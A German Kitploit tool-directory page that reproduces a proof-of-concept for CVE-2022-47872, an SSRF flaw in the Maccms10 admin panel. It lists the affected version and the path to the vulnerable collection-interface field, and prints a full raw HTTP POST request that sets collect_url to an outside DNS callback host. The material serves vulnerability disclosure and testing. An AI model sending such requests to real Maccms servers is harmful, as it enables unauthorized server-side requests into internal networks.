Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2022-47872 — Proof-of-Concept für die SSRF-Schwachstelle im Maccms10-Admin-Panel, das die Ausnutzung über eine benutzerdefinierte Schnittstellensammlung mit HTTP-Anfragedetails demonstriert. | Kitploit
Tools/GitHubGitHub/cedric1314/cve-2022-47872
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHubcedric1314/cve-2022-47872

CVE-2022-47872

Proof-of-Concept für die SSRF-Schwachstelle im Maccms10-Admin-Panel, das die Ausnutzung über eine benutzerdefinierte Schnittstellensammlung mit HTTP-Anfragedetails demonstriert.

Repository anzeigen
vor 3 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

#CVE-2022-47872

maccms10 Admin+ SSRF-Angriffe

Übersicht

Informationen zur Hersteller-Website:https://maccms.pro

Quellcode-Download-Adresse: https://github.com/maccmspro/maccms10.git

Betroffene Version: V2021.1000.2000

图片

2.Schwachstellendetails

https://github.com/maccmspro/maccms10/issues/22

Rufen Sie das Backend auf, klicken Sie auf Sammeln --> Benutzerdefinierte Schnittstelle --> Schnittstellenadresse,

Geben Sie im Namensfeld Payload1:http://7ca8e96e.dns.1433.eu.org ein.

Dies kann SSRF-Angriffe verursachen.

Schwachstellenname:SSRF-Angriffe

Schwachstellenstufe:Mittleres Risiko

Schwachstellenort: Klicken Sie auf Sammeln --> Benutzerdefinierte Schnittstelle --> Schnittstellenadresse

3.Wiederkehrende Schwachstellen und

POST http://192.168.52.163/admin.php/admin/collect/info.html HTTP/1.1

Host: 192.168.52.163

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:106.0) Gecko/20100101 Firefox/106.0

Accept: /

AcceptLanguage: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding:gzip,deflate

Content-Type: applicat ion/ x-www-form-urlencoded; charset=UTF-8

X-Requested-With: XMLHttpRequest

Content-Length: 226

Origin: http://192.168.52.163

Connection: close

Referer: http://192.168.52.163/admin.php/admin/collect/info.html

Cookie: PHPSESSID=gn328q2i2ruajsh96qoll65ia7

collect_id=&token=8d639020c85bde89f9276381d2460046&collect_name=1111&collect_url=http%3A%2F%2F7ca8e96e.dns.1433.eu.org.&collect_param=%26q%3D1&collect_type=1&collect_mid=1&collect_opt=Ø&collect_filter=0&collect_filter_from=

图片

图片

图片

图片

图片

Tool herunterladen